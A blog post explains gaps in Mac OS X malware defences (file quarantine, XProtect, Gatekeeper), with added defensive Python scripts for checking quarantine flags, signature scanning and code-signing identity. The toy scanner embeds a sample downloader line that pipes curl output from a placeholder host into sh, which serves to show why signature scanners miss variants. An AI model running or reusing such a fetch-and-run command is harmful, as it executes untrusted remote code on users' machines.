I spend a lot of time telling people about how their Mac protects them from malware. I have even written an entire section on the topic in my Mac Malware Guide. So it may be a bit surprising that I seem to be suddenly turning around and saying the opposite. That’s not the case, though. The Mac still protects you just as I have said… but it’s also important to keep in mind where the holes in those defenses are. Just as a house isn’t secure if the owner is unaware that the back door is unlocked, a Mac isn’t safe if the owner isn’t aware of the holes in its security.
Before I start discussing these vulnerabilities, it’s important to understand the defenses. If you aren’t already familiar with them, I would refer you to my Mac Malware Guide – specifically, the section titled How does Mac OS X protect me?. Once you have read that and understood the defenses, we can discuss weaknesses.
The most notable weakness is a little-discussed issue with the entire file quarantine system in Mac OS X. This system works well on files that you download directly to the computer through an app like Safari or Mail. When you do so, the downloading app marks the file as quarantined (the mark is an extended attribute named com.apple.quarantine attached to the file), and the first time that file is opened, Mac OS X defenses like XProtect and Gatekeeper come into play.
However, there are ways of getting files past the quarantine system, and I’m not talking about sneaky hacker tricks. I’m talking about normal things. For example, copying a file from an external hard drive, flash drive, CD or DVD bypasses quarantine, because nothing in that path ever sets the flag. If the file was downloaded on another Mac, still carries the quarantine flag, and is stored on media that preserves Mac metadata, then the flag comes along with it and all is well; if not, the file will not be quarantined, and neither XProtect nor Gatekeeper will look at it when it is opened. Care must therefore be taken with files on external drives or optical media whose sources aren’t known.
Similarly, the quarantine system relies on the app being used for downloading doing things properly. Not all do, and this can result in the quarantine flag not being set on downloaded files. Thus, it’s important to know whether or not a particular app properly supports file quarantine. You can assume any Apple app does, but when it comes to third-party apps, a simple test is necessary. Download an application that you are sure is safe, then test to see if you can open it. If you don’t see a warning that the application was downloaded from the internet, the application you used to download that file isn’t properly supporting quarantine, and should not be trusted. You can also confirm this directly in Terminal: running xattr -l on the downloaded file should list com.apple.quarantine; if it doesn’t, the flag was never set.
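The two checks above (is a file from a USB stick or disc quarantined at all, and which app set the flag on a download) can be automated. The script below is an added example and is not code from the original post; it reads the com.apple.quarantine attribute with the xattr command that ships with Mac OS X, parses the "flags;hextime;agent;uuid" value it holds, and can build a value you may write yourself with xattr -w so that Gatekeeper and XProtect evaluate a file that arrived outside the quarantine path. The flag value 0x0081 used as the default is the one downloads commonly carry; treat it as an opaque default (assumption), not as documented bit semantics.

```python
"""Inspect (and optionally construct) the com.apple.quarantine attribute.

Added example, not code from the original post. Assumptions are marked inline.
"""
import platform
import subprocess
import time
from dataclasses import dataclass
from typing import Optional

QUARANTINE_XATTR = "com.apple.quarantine"


@dataclass
class QuarantineInfo:
    flags: int       # hex bit-field written by the downloading app
    timestamp: int   # download time, seconds since the Unix epoch
    agent: str       # name of the app that set the flag (e.g. "Safari")
    uuid: str        # LaunchServices download record id (may be empty)


def parse_quarantine(value: str) -> QuarantineInfo:
    """Parse the raw attribute string "flags;hextime;agent;uuid".

    The semicolon-separated layout is what macOS writes; the trailing UUID
    is not always present, so it is optional here.
    """
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine format: {value!r}")
    flags, hextime, agent = parts[0], parts[1], parts[2]
    uuid = parts[3] if len(parts) > 3 else ""
    return QuarantineInfo(int(flags, 16), int(hextime, 16), agent, uuid)


def read_quarantine(path: str) -> Optional[str]:
    """Return the raw attribute value, or None if the file is not quarantined.

    Uses xattr(1) from macOS; on any other OS there is nothing to read.
    """
    if platform.system() != "Darwin":
        return None
    proc = subprocess.run(
        ["xattr", "-p", QUARANTINE_XATTR, path],
        capture_output=True, text=True,
    )
    return proc.stdout.strip() if proc.returncode == 0 else None


def make_quarantine_value(agent: str = "manual", flags: int = 0x0081) -> str:
    """Build a value for: xattr -w com.apple.quarantine <value> <file>

    Writing the attribute by hand puts a file copied from a USB stick or disc
    back under Gatekeeper/XProtect scrutiny on its next open. The 0x0081 flag
    default is an assumption taken from typical browser downloads.
    """
    return f"{flags:04x};{int(time.time()):x};{agent};"


def report(path: str) -> str:
    """Human-readable summary for one file."""
    raw = read_quarantine(path)
    if raw is None:
        return f"{path}: NOT quarantined (Gatekeeper/XProtect will not check it on open)"
    info = parse_quarantine(raw)
    when = time.strftime("%Y-%m-%d %H:%M", time.gmtime(info.timestamp))
    return f"{path}: quarantined by {info.agent} at {when} UTC (flags 0x{info.flags:04x})"


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(report(p))
```

Run it against a file you just downloaded with the browser under test: if the report says the file is not quarantined, that browser is the one at fault, which is exactly the condition the open-the-file test above detects.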
It’s also worth pointing out that malware that comes onto the system through vulnerabilities in third-party software, such as Java, Adobe Flash Player or Microsoft Office, bypasses quarantine entirely. The infamous Flashback malware, for example, used Java vulnerabilities to copy executable files into the system. Since this was done behind the scenes, out of view of quarantine, those executables were able to run without any user interaction whatsoever. Keeping third-party software updated, and limiting the “attack surface” by reducing or eliminating use of browser plug-ins like Java and Flash, is important for protecting against such attacks.
The next potential hole in the chain involves XProtect. Since XProtect is essentially just a basic anti-virus scanner, it has the same limitations as most such tools. Namely, if the malware in question hasn’t been seen by Apple and added to the XProtect definitions, XProtect won’t block it. Every time new malware appears, there is always a delay before it is added to XProtect. Sometimes that delay is very short, but other times it can be unacceptably long. For example, in the recent case of Icefog, Apple didn’t add the definition to XProtect until two weeks after they were alerted to the malware.
Unfortunately, there’s not much the user can do to solve this issue, beyond the difficult-to-quantify advice frequently given to exercise caution about what is downloaded, or possibly using another layer of security (like anti-virus software). It’s important to note that anti-virus software can sometimes protect the user sooner than XProtect, as was the case with Icefog, but not always.
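To make the XProtect limitation concrete, here is a toy scanner that works the way a definitions-based tool does: a file is flagged only if its hash matches an entry that has already been shipped. This is an added example and not Apple’s code; the definition layout (Description / Matches / Identity holding a SHA-1) is modelled loosely on the XProtect.plist of the time rather than copied from it, every sample payload is constructed, and the definitions path is the one used by OS X 10.6 through 10.10 (assumption: later releases moved it). The helper that reads XProtect.meta.plist lets you see which definitions version is installed, which is the only hard fact you have when wondering whether a newly reported threat is covered yet.

```python
"""A toy signature scanner that behaves like XProtect.

Added example, not Apple's code. Definition layout is a simplified stand-in
for the old XProtect.plist; all sample payloads are constructed.
"""
import hashlib
import os
import plistlib
from typing import Dict, List, Optional, Tuple

# Definitions location on OS X 10.6 - 10.10 (assumption: moved in later releases).
XPROTECT_DIR = "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources"
XPROTECT_META = os.path.join(XPROTECT_DIR, "XProtect.meta.plist")

# Constructed sample payloads: a "known" downloader script and a one-byte variant.
KNOWN_BAD = b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\n"
VARIANT = KNOWN_BAD.replace(b"-s ", b"-sS ")


def build_definitions(samples: List[Tuple[str, bytes]]) -> bytes:
    """Serialise (name, payload) pairs into a plist of SHA-1 identities."""
    entries = [
        {"Description": name,
         "Matches": [{"MatchType": "Match",
                      "Identity": hashlib.sha1(data).digest()}]}
        for name, data in samples
    ]
    return plistlib.dumps(entries)


def load_definitions(plist_bytes: bytes) -> Dict[bytes, str]:
    """Flatten the plist into {sha1_digest: description}."""
    table: Dict[bytes, str] = {}
    for entry in plistlib.loads(plist_bytes):
        for match in entry.get("Matches", []):
            if match.get("MatchType") == "Match" and "Identity" in match:
                table[bytes(match["Identity"])] = entry["Description"]
    return table


def scan_bytes(data: bytes, defs: Dict[bytes, str]) -> Optional[str]:
    """Return the definition name if the content is known-bad, else None."""
    return defs.get(hashlib.sha1(data).digest())


def scan_path(path: str, defs: Dict[bytes, str]) -> Optional[str]:
    """Hash a file on disk and look it up, as a definitions-based scanner would."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(), defs)


def installed_definitions_version() -> Optional[dict]:
    """Version and last-modification stamp of the installed XProtect definitions,
    or None when the file is absent (non-Mac, or a release with another layout)."""
    try:
        with open(XPROTECT_META, "rb") as fh:
            meta = plistlib.load(fh)
    except OSError:
        return None
    return {"Version": meta.get("Version"),
            "LastModification": meta.get("LastModification")}


# One shipped definition. Anything not in this table is invisible to the scanner.
DEFINITIONS = load_definitions(build_definitions([("Example.Downloader.A", KNOWN_BAD)]))

if __name__ == "__main__":
    print("installed definitions:", installed_definitions_version())
    print("known sample :", scan_bytes(KNOWN_BAD, DEFINITIONS))
    print("one-byte edit:", scan_bytes(VARIANT, DEFINITIONS))
```

The one-byte variant scans clean even though it does exactly the same thing, which is the whole gap: until Apple has seen a sample and shipped a definition for it, XProtect has nothing to match against, and the same holds for any signature-based anti-virus product.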
Other security holes involve Gatekeeper. This is great technology, but it’s only as good as the user allows it to be. Some users disable it, either entirely or on a case-by-case basis, to run apps that don’t come from identified developers. That’s okay in some cases – I myself have some apps that I had to bypass Gatekeeper for – as long as you are positive the app is legit. However, careless bypassing removes this layer of security entirely. Gatekeeper should be kept at its default setting (Mac App Store and identified developers), or the more secure App Store-only setting, to avoid such problems. Exceptions should be made, if at all, by control-clicking the application and choosing Open, rather than by disabling Gatekeeper entirely.
In addition, hackers have been known (in the cases of the KitM and Janicab trojans) to use throwaway developer IDs to sign their malware, thus bypassing Gatekeeper. This trick only works as long as the malware is not discovered by Apple, at which time they can revoke the developer ID and “kill” the app, but for tightly targeted malware, that could be a long time. A valid Developer ID signature proves only that Apple issued a certificate to someone, not that the someone is honest, so there’s not much to be done about avoiding signed malware beyond looking at who actually signed an app before trusting it and (again) using some additional form of anti-virus software, which may or may not catch something that gets past XProtect and Gatekeeper.
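The Gatekeeper decision and the identity behind a signature can both be inspected from Terminal with spctl and codesign, and the script below wraps them so that a Developer ID-signed app is accepted silently only when its team identifier is one you have already vetted. This is an added example, not code from the original post or from Apple: the sample tool outputs are constructed, the TRUSTED_TEAMS allowlist and the team identifier ABCDE12345 are hypothetical placeholders, and the output parsing assumes the "<path>: accepted / source=…" lines spctl prints and the "Authority=" and "TeamIdentifier=" lines codesign -dvv prints.

```python
"""Gatekeeper assessment plus signer inspection for an app bundle.

Added example (not from the original post). Wraps spctl(8) and codesign(1),
which ship with OS X; sample outputs and the allowlist are constructed.
"""
import platform
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Hypothetical allowlist of Developer ID team identifiers you have vetted.
TRUSTED_TEAMS = {"ABCDE12345"}

# Constructed sample outputs, shaped like the real tools' reports.
SAMPLE_SPCTL = "/Applications/Example.app: accepted\nsource=Developer ID\n"
SAMPLE_CODESIGN = (
    "Executable=/Applications/Example.app/Contents/MacOS/Example\n"
    "Identifier=com.example.app\n"
    "Authority=Developer ID Application: Example Corp (ABCDE12345)\n"
    "Authority=Developer ID Certification Authority\n"
    "Authority=Apple Root CA\n"
    "TeamIdentifier=ABCDE12345\n"
)


@dataclass
class Assessment:
    accepted: bool          # would Gatekeeper let this app launch?
    source: str             # "Mac App Store", "Developer ID", "no usable signature", ...
    authorities: List[str]  # certificate chain, leaf first
    team_id: Optional[str]  # 10-character Developer ID team identifier


def parse_spctl(output: str) -> Tuple[bool, str]:
    """Parse `spctl --assess --type execute --verbose <app>` output."""
    accepted = bool(re.search(r": accepted\b", output))
    m = re.search(r"^source=(.*)$", output, re.M)
    return accepted, (m.group(1).strip() if m else "unknown")


def parse_codesign(output: str) -> Tuple[List[str], Optional[str]]:
    """Pull the Authority= chain and TeamIdentifier= out of `codesign -dvv` output."""
    authorities = [a.strip() for a in re.findall(r"^Authority=(.*)$", output, re.M)]
    m = re.search(r"^TeamIdentifier=(.*)$", output, re.M)
    team = m.group(1).strip() if m else None
    if (team is None or team == "not set") and authorities:
        # Fall back to the "(TEAMID)" suffix in the leaf certificate's name.
        m2 = re.search(r"\(([A-Z0-9]{10})\)$", authorities[0])
        team = m2.group(1) if m2 else None
    return authorities, team


def build_assessment(spctl_output: str, codesign_output: str) -> Assessment:
    accepted, source = parse_spctl(spctl_output)
    authorities, team = parse_codesign(codesign_output)
    return Assessment(accepted, source, authorities, team)


def assess(app_path: str) -> Assessment:
    """Run the real tools (macOS only); both report on stderr, so merge streams."""
    if platform.system() != "Darwin":
        raise RuntimeError("spctl/codesign are only available on macOS")
    sp = subprocess.run(["spctl", "--assess", "--type", "execute", "--verbose", app_path],
                        capture_output=True, text=True)
    cs = subprocess.run(["codesign", "-dvv", app_path], capture_output=True, text=True)
    return build_assessment(sp.stdout + sp.stderr, cs.stdout + cs.stderr)


def verdict(a: Assessment, trusted_teams=TRUSTED_TEAMS) -> str:
    """Turn an assessment into advice a user can act on."""
    if not a.accepted:
        return (f"REJECTED by Gatekeeper ({a.source}); do not control-click Open "
                "unless you are certain of the source")
    if a.source == "Mac App Store":
        return "OK: signed through the Mac App Store"
    if a.team_id in trusted_teams:
        return f"OK: Developer ID team {a.team_id} is on your vetted list"
    leaf = a.authorities[0] if a.authorities else "no certificate"
    return (f"CAUTION: Gatekeeper accepts it, but Developer ID team {a.team_id or 'unknown'} "
            f"({leaf}) is not one you have vetted; a valid signature proves only that "
            "Apple issued a certificate, not that the developer is honest")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(verdict(assess(sys.argv[1])))
    else:
        print(verdict(build_assessment(SAMPLE_SPCTL, SAMPLE_CODESIGN)))
```

A throwaway certificate of the kind used by KitM and Janicab passes the first check just like any other; the only difference the script surfaces is that the team behind it is not one you know, which is why the CAUTION branch reports the signer rather than silently accepting.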
So, what’s the takeaway message here? For the most part, as long as you’re aware of these issues and careful about what you open, you’ll be okay. However, that’s not a guarantee of safety. There are ways that malware could sneak in, using tricks that could sometimes fool reasonably savvy users, or newly-discovered vulnerabilities in the system or third-party software. Some users may benefit from the use of anti-virus software, as an additional layer of security, though that’s certainly far from a requirement. If you do decide to use anti-virus software, be aware that against a brand new threat that bypasses the security in Mac OS X, it may do no better than the built-in defenses.
If you do decide that you need anti-virus software, be sure to do your research. Many anti-virus programs aren’t much more than a Mac wrapper around a Windows-based app, and they don’t provide decent protection against Mac threats. Others can protect you well, but may cause problems, like destabilizing your system. Don’t install anti-virus software lightly, be sure you know how to properly remove it if it causes problems, and remember that the most aggressively-marketed software is often not the best.
Tags: anti-virus, Gatekeeper, Mac OS X, quarantine, XProtect